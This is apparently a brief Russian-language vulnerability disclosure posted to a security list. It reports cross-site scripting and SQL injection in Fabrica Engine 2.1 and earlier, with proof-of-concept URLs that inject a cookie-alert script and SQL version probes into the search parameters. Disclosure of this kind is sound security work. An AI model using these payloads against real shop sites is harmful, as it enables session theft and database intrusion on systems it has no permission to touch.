Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting, Denial of Service и SQL Injection уязвимостях в Fabrica Engine. Это коммерческий движок для онлайн-магазинов.
XSS (WASC-08):
http://site/search/?pmin=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search/?pmax=%3Cscript%3Ealert(document.cookie)%3C/script%3E
DoS (WASC-10):
SQL Injection (WASC-19):
http://site/search/?pmin=1%20and%20version()=5%20limit%201/*&keyword=1
http://site/search/?pmax=1%20and%20version()=5%20limit%201/*&keyword=1
Уязвимы Fabrica Engine 2.1 и предыдущие версии.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4721/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua